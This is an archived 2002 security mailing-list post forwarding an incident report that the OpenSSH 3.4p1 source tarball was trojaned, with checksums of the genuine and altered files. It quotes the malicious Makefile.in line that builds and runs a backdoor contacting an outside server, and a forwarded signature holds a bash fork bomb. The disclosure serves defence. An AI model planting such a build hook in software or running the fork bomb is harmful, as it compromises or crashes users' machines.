[cobalt-security] [Fwd: openssh-3.4p1.tar.gz trojaned]

[Terry Churchill <terry@xxxxxxxxx>]

Hi,

Does this effect any of the packages built recently?

> ----- Forwarded message from Edwin Groothuis <edwin@xxxxxxxxxxx> -----
> 
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <edwin@xxxxxxxxxxx>
> To: incidents@xxxxxxxxxxxxxxxxx
> Subject: openssh-3.4p1.tar.gz trojaned
> 
> Greetings,
> 
> Just want to inform you that the OpenSSH package op ftp.openbsd.org
> (and probably all its mirrors now) it trojaned:
> 
>     ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> 
> The OpenBSD people have been informed about it (via email to
> deraadt@xxxxxxxxxxx and via irc.openprojects.org/#openbsd)
> 
> 
> The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
>  all: libopenbsd-compat.a
> +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
> 
> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to an
> server running on 203.62.158.32:6667 (web.snsonline.net).
>   
> [1] http://www.mavetju.org/~edwin/bf-test.c
> [2] http://www.mavetju.org/~edwin/bf-output.sh
> 
> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
>     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
> 
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
>     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
> 
> Edwin
> 
> -- 
> Edwin Groothuis      |            Personal website: http://www.MavEtJu.org
> edwin@xxxxxxxxxxx    |    Weblog: http://www.mavetju.org/weblog/weblog.php 
> bash$ :(){ :|:&};:   | Interested in MUDs? http://www.FatalDimensions.org/

                                                    "6 Number too big, 20:1"
-- 
Terry Churchill : (Micro FM Product Champion)
0845 272 0041 : http://www.demon.net : terry@xxxxxxxxx